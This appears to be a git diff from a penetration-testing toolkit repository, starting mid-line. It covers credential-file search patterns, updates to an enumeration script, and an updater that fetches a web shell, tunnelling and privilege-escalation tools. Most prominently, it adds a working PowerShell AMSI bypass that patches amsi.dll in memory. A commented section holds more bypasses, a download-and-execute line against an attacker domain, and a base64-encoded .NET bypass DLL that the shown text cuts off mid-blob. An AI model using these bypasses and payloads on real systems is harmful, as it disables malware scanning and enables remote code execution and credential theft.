"$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "passbolt\.php$" | sort | uniq | head -n 70) + PSTORAGE_JETTY=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "jetty-realm\.properties$" | sort | uniq | head -n 70) + PSTORAGE_WGET=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "\.wgetrc$" | sort | uniq | head -n 70) + PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70) + PSTORAGE_OTHER_INTERESTING_FILES=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70) + PSTORAGE_WINDOWS_FILES=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "unattend\.inf$|.*\.rdg$|AppEvent\.Evt$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$" | sort | uniq | head -n 70) + PSTORAGE_DATABASE=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -v -E '/man/|/usr/|/var/cache/' | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70) + PSTORAGE_BACKUPS=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "backup$|backups$" | sort | uniq | head -n 70) + PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head -n 70) ##### POST SERACH VARIABLES ##### diff --git a/lse.sh b/lse.sh index aaec35a..63d36dd 100755 --- a/lse.sh +++ b/lse.sh @@ -5,7 +5,7 @@ # Author: Diego Blanco # GitHub: https://github.com/diego-treitos/linux-smart-enumeration # -lse_version="3.9" +lse_version="3.10" #( Colors # @@ -117,6 +117,7 @@ lse_common_setuid=" /usr/bin/firejail /usr/bin/fusermount /usr/bin/fusermount-glusterfs +/usr/bin/fusermount3 /usr/bin/gpasswd /usr/bin/kismet_capture /usr/bin/mount @@ -124,6 +125,7 @@ lse_common_setuid=" /usr/bin/newgidmap /usr/bin/newgrp /usr/bin/newuidmap +/usr/bin/ntfs-3g /usr/bin/passwd /usr/bin/pkexec /usr/bin/pmount @@ -550,17 +552,26 @@ lse_procmon() { } lse_proc_print() { # Pretty prints output from lse_procmom received via stdin - printf "${green}%s %8s %8s %s\n" "START" "PID" "USER" "COMMAND" + if $lse_color; then + printf "${green}%s %8s %8s %s\n" "START" "PID" "USER" "COMMAND" + else + printf "%s %8s %8s %s\n" "START" "PID" "USER" "COMMAND" + fi while read -r l; do p_num=`echo "$l" | cut -d" " -f1` p_time=`echo "$l" | cut -d" " -f2` p_pid=`echo "$l" | cut -d" " -f3` p_user=`echo "$l" | cut -d" " -f4` p_args=`echo "$l" | cut -d" " -f5-` - if [ $((p_num)) -lt 20 ]; then # few times probably periodic - printf "${red}%s ${reset}%8s ${yellow}%8s ${red}%s\n" "$p_time" "$p_pid" "$p_user" "$p_args" + + if $lse_color; then + if [ $((p_num)) -lt 20 ]; then # few times probably periodic + printf "${red}%s ${reset}%8s ${yellow}%8s ${red}%s\n" "$p_time" "$p_pid" "$p_user" "$p_args" + else + printf "${magenta}%s ${reset}%8s ${yellow}%8s ${reset}%s\n" "$p_time" "$p_pid" "$p_user" "$p_args" + fi else - printf "${magenta}%s ${reset}%8s ${yellow}%8s ${reset}%s\n" "$p_time" "$p_pid" "$p_user" "$p_args" + printf "%s %8s %8s %s\n" "$p_time" "$p_pid" "$p_user" "$p_args" fi done } @@ -803,7 +814,7 @@ lse_run_tests_filesystem() { #are there possible credentials in any shell history files lse_test "fst200" "0" \ "Are there possible credentials in any shell history file?" \ - 'for h in .bash_history .history .histfile .zhistory; do [ -f "$lse_home/$h" ] && grep $lse_grep_opts -Ei "(user|username|login|pass|password|pw|credentials)[=: ][a-z0-9]+" "$lse_home/$h"; done' + 'for h in .bash_history .history .histfile .zhistory; do [ -f "$lse_home/$h" ] && grep $lse_grep_opts -Ei "(user|username|login|pass|password|pw|credentials)[=: ][a-z0-9]+" "$lse_home/$h" | grep -v "systemctl"; done' #nfs exports with no_root_squash lse_test "fst210" "0" \ diff --git a/update.sh b/update.sh index 35f9a15..df7eca9 100755 --- a/update.sh +++ b/update.sh @@ -1,33 +1,63 @@ #!/bin/bash +download () { + tmpfile=$(mktemp /tmp/wget.XXXXXX) + wget --no-verbose "$1" -O "$tmpfile" + status=$? + if [ $status -eq 0 ]; then + old_permissions=$(stat -c "%a" "$2") + mv "$tmpfile" "$2" + chmod "$old_permissions" "$2" + fi +} + +get_latest_version () { + repository=$1 + prefix=$2 + location=$(curl -s -I https://github.com/$repository/releases/latest | grep -i "location: " | awk '{ print $2 }') + if [[ "$location" =~ ^https://github.com/$repository/releases/tag/$prefix(.*) ]]; then + version=${BASH_REMATCH[1]} + version=${version%%[[:space:]]} + echo $version + fi +} + echo "Updating scripts…" -wget --no-verbose https://raw.githubusercontent.com/initstring/uptux/master/uptux.py -O uptux.py -wget --no-verbose https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh -O unix-privesc-check.sh -wget --no-verbose https://github.com/DominicBreuker/pspy/releases/latest/download/pspy64 -O pspy64 -wget --no-verbose https://github.com/DominicBreuker/pspy/releases/latest/download/pspy32 -O pspy -wget --no-verbose https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php -O p0wny-shell.php -wget --no-verbose https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh -O lse.sh -wget --no-verbose https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O linux-exploit-suggester.sh -wget --no-verbose https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/linpeas.sh -O linpeas.sh -wget --no-verbose https://github.com/rebootuser/LinEnum/raw/master/LinEnum.sh -O LinEnum.sh -wget --no-verbose https://github.com/stealthcopter/deepce/raw/main/deepce.sh -O deepce.sh +# download https://raw.githubusercontent.com/initstring/uptux/master/uptux.py uptux.py +# download https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh unix-privesc-check.sh +# download https://github.com/DominicBreuker/pspy/releases/latest/download/pspy64 pspy64 +# download https://github.com/DominicBreuker/pspy/releases/latest/download/pspy32 pspy +# download https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php p0wny-shell.php +# download https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh lse.sh +# download https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh linux-exploit-suggester.sh +# download https://github.com/rebootuser/LinEnum/raw/master/LinEnum.sh LinEnum.sh +# download https://github.com/stealthcopter/deepce/raw/main/deepce.sh deepce.sh + +echo "Updating LinPEAS + WinPEAS…" +peas_version=$(get_latest_version carlospolop/PEASS-ng) +if [ ! -z "$peas_version" ]; then + echo "Got PEAS version: $peas_version" + download https://github.com/carlospolop/PEASS-ng/releases/download/$peas_version/linpeas.sh linpeas.sh + download https://github.com/carlospolop/PEASS-ng/releases/download/$peas_version/winPEASx86.exe win/winPEAS.exe + download https://github.com/carlospolop/PEASS-ng/releases/download/$peas_version/winPEASx64.exe win/winPEASx64.exe + download https://github.com/carlospolop/PEASS-ng/releases/download/$peas_version/winPEAS.bat win/winPEAS.bat +else + echo "Unable to determine latest PEAS version" +fi echo "Updating Chisel…" -location=$(curl -s -I https://github.com/jpillora/chisel/releases/latest | grep -i "location: " | awk '{ print $2 }') -if [[ "$location" =~ ^https://github.com/jpillora/chisel/releases/tag/v(.*) ]]; then - chisel_version=${BASH_REMATCH[1]} - chisel_version=${chisel_version%%[[:space:]]} - echo "Got Chisel version: ${chisel_version}" - curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_linux_386.gz" | gzip -d > chisel - curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_linux_amd64.gz" | gzip -d > chisel64 - curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_windows_386.gz" | gzip -d > win/chisel.exe - curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_windows_amd64.gz" | gzip -d > win/chisel64.exe +chisel_version=$(get_latest_version jpillora/chisel v) +if [ ! -z "$peas_version" ]; then + echo "Got Chisel version: $chisel_version" + curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_linux_386.gz" | gzip -d > chisel + curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_linux_amd64.gz" | gzip -d > chisel64 + curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_windows_386.gz" | gzip -d > win/chisel.exe + curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_windows_amd64.gz" | gzip -d > win/chisel64.exe +else + echo "Unable to determine latest chisel version" fi # TODO: add others echo "Updating windows tools…" -wget --no-verbose https://live.sysinternals.com/accesschk.exe -O win/accesschk.exe -wget --no-verbose https://live.sysinternals.com/accesschk64.exe -O win/accesschk64.exe -wget --no-verbose https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe -O win/winPEAS.exe -wget --no-verbose https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/binaries/x64/Release/winPEASx64.exe -O win/winPEASx64.exe -wget --no-verbose https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/winPEAS/winPEASbat/winPEAS.bat -O win/winPEAS.bat +download https://live.sysinternals.com/accesschk.exe win/accesschk.exe +download https://live.sysinternals.com/accesschk64.exe win/accesschk64.exe diff --git a/win/amsi-bypass.ps1 b/win/amsi-bypass.ps1 new file mode 100644 index 0000000..72df791 --- /dev/null +++ b/win/amsi-bypass.ps1 @@ -0,0 +1,190 @@ +###################################################################################################################################### +# Latest (and useful!) AMSI bypass using egghunting method (from June 2019) +# Last test: 19th May 2020 +# +# +# Example on how to use-it for real-life payload delivery : https://github.com/kmkz/exploit/blob/master/Full-payload-delivery-chain.ps1 +###################################################################################################################################### +Write-Host "-- AMSI Patch" +Write-Host "-- Paul Laîné (@am0nsec)" +Write-Host "" + +$Kernel32 = @" +using System; +using System.Runtime.InteropServices; + +public class Kernel32 { + [DllImport("kernel32")] + public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName); + + [DllImport("kernel32")] + public static extern IntPtr LoadLibrary(string lpLibFileName); + + [DllImport("kernel32")] + public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); +} +"@ + +Add-Type $Kernel32 + +Class Hunter { + static [IntPtr] FindAddress([IntPtr]$address, [byte[]]$egg) { + while ($true) { + [int]$count = 0 + + while ($true) { + [IntPtr]$address = [IntPtr]::Add($address, 1) + If ([System.Runtime.InteropServices.Marshal]::ReadByte($address) -eq $egg.Get($count)) { + $count++ + If ($count -eq $egg.Length) { + return [IntPtr]::Subtract($address, $egg.Length - 1) + } + } Else { break } + } + } + + return $address + } +} + +[IntPtr]$hModule = [Kernel32]::LoadLibrary("amsi.dll") +Write-Host "[+] AMSI DLL Handle: $hModule" + +[IntPtr]$dllCanUnloadNowAddress = [Kernel32]::GetProcAddress($hModule, "DllCanUnloadNow") +Write-Host "[+] DllCanUnloadNow address: $dllCanUnloadNowAddress" + +If ([IntPtr]::Size -eq 8) { + Write-Host "[+] 64-bits process" + [byte[]]$egg = [byte[]] ( + 0x4C, 0x8B, 0xDC, # mov r11,rsp + 0x49, 0x89, 0x5B, 0x08, # mov qword ptr [r11+8],rbx + 0x49, 0x89, 0x6B, 0x10, # mov qword ptr [r11+10h],rbp + 0x49, 0x89, 0x73, 0x18, # mov qword ptr [r11+18h],rsi + 0x57, # push rdi + 0x41, 0x56, # push r14 + 0x41, 0x57, # push r15 + 0x48, 0x83, 0xEC, 0x70 # sub rsp,70h + ) +} Else { + Write-Host "[+] 32-bits process" + [byte[]]$egg = [byte[]] ( + 0x8B, 0xFF, # mov edi,edi + 0x55, # push ebp + 0x8B, 0xEC, # mov ebp,esp + 0x83, 0xEC, 0x18, # sub esp,18h + 0x53, # push ebx + 0x56 # push esi + ) +} +[IntPtr]$targetedAddress = [Hunter]::FindAddress($dllCanUnloadNowAddress, $egg) +Write-Host "[+] Targeted address: $targetedAddress" + +$oldProtectionBuffer = 0 +[Kernel32]::VirtualProtect($targetedAddress, [uint32]2, 4, [ref]$oldProtectionBuffer) | Out-Null + +$patch = [byte[]] ( + 0x31, 0xC0, # xor rax, rax + 0xC3 # ret +) +[System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $targetedAddress, 3) + +$a = 0 +[Kernel32]::VirtualProtect($targetedAddress, [uint32]2, $oldProtectionBuffer, [ref]$a) | Out-Null + +<# + +AMSI bypass historic + + + +---------------------------------------------------------------------------------------------------------------------- +$mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076); +[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue($null, $null); +[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue($null, [IntPtr]$mem); +[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; +$e=new-object net.webclient; +$e.proxy=[Net.WebRequest]::GetSystemWebProxy(); +$e.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials; +IEX $e.downloadstring('http://attacker-trusted-domain/pwn'); + +###################################################################################################################################### +# Tested on Win10 (31/10/2018) +# +# Source: https://0x00-0x00.github.io/research/2018/10/28/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html +###################################################################################################################################### + +function Bypass-AMSI +{ + if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMSI").Type) { + [Reflection.Assembly]::Load([Convert]::FromBase64String("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N0RBQ0VEAEJ5cGFzc0FNU0kAbXNjb3JsaWIAc3JjAERpc2FibGUAUnVudGltZUZpZWxkSGFuZGxlAENvbnNvbGUAaE1vZHVsZQBwcm9jTmFtZQBuYW1lAFdyaXRlTGluZQBWYWx1ZVR5cGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAQnl0ZQBkd1NpemUAc2l6ZQBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAEFsbG9jSEdsb2JhbABNYXJzaGFsAEtlcm5lbDMyLmRsbABCeXBhc3NBTVNJLmRsbABTeXN0ZW0AU3lzdGVtLlJlZmxlY3Rpb24Ab3BfQWRkaXRpb24AWmVybwAuY3RvcgBVSW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBSdW50aW1lSGVscGVycwBCeXBhc3MAR2V0UHJvY0FkZHJlc3MAbHBBZGRyZXNzAE9iamVjdABscGZsT2xkUHJvdGVjdABWaXJ0dWFsUHJvdGVjdABmbE5ld1Byb3RlY3QAb3BfRXhwbGljaXQAZGVzdABJbml0aWFsaXplQXJyYXkAQ29weQBMb2FkTGlicmFyeQBSdGxNb3ZlTWVtb3J5AG9wX0VxdWFsaXR5AAAAABFhAG0AcwBpAC4AZABsAGwAAFdFAFIAUgBPAFIAOgAgAEMAbwB1AGwAZAAgAG4AbwB0ACAAcgBlAHQAcgBpAGUAdgBlACAAYQBtAHMAaQAuAGQAbABsACAAcABvAGkAbgB0AGUAcgAuAAAdQQBtAHMAaQBTAGMAYQBuAEIAdQBmAGYAZQByAABzRQBSAFIATwBSADoAIABDAG8AdQBsAGQAIABuAG8AdAAgAHIAZQB0AHIAaQBlAHYAZQAgAEEAbQBzAGkAUwBjAGEAbgBCAHUAZgBmAGUAcgAgAGYAdQBuAGMAdABpAG8AbgAgAHAAbwBpAG4AdABlAHIAAHVFAFIAUgBPAFIAOgAgAEMAbwB1AGwAZAAgAG4AbwB0ACAAYwBoAGEAbgBnAGUAIABBAG0AcwBpAFMAYwBhAG4AQgB1AGYAZgBlAHIAIABtAGUAbQBvAHIAeQAgAHAAZQByAG0AaQBzAHMAaQBvAG4AcwAhAABNQQBtAHMAaQBTAGMAYQBuAEIAdQBmAGYAZQByACAAcABhAHQAYwBoACAAaABhAHMAIABiAGUAZQBuACAAYQBwAHAAbABpAGUAZAAuAAAAAABNy6E5KHzvRJzwgzKCw/hXAAQgAQEIAyAAAQUgAQEREQQgAQEOBCABAQIHBwUYGBkJGAIGGAUAAgIYGAQAAQEOBAABGQsHAAIBEmERZQQAARgICAAEAR0FCBgIBQACGBgICLd6XFYZNOCJAwYREAUAAhgYDgQAARgOCAAEAhgZCRAJBgADARgYCAMAAAgIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBCAEAAgAAAAAADwEACkJ5cGFzc0FNU0kAAAUBAAAAABcBABJDb3B5cmlnaHQgwqkgIDIwMTgAACkBACQ4Y2ExNGM0OS02NDRiLTQwY2YtYjFjNy1hNWJkYWViMGIyY2EAAAwBAAcxLjAuMC4wAABNAQAcLk5FVEZyYW1ld